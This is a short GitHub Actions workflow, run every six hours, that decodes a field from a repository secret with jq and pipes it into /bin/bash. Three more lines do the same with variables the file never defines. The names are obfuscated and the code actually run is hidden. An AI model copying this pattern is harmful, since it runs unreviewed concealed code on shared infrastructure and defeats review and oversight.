name: huaizhongjiechu

on:
  workflow_dispatch:
  schedule:
    - cron: '2 0/6 * * *'

jobs:  # 13306
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: huaizhongjiechu
        env:
          ysx1: ${{ secrets.ysx1 }}
        run: |
          echo $ysx1 | jq -r .vnnco8 | /bin/bash
          echo $dutbp6 | jq -r .fhv1 | /bin/bash
          echo $coya6963 | jq -r .ign2207 | /bin/bash
          echo $bfyf38986 | jq -r .yvaec82985 | /bin/bash

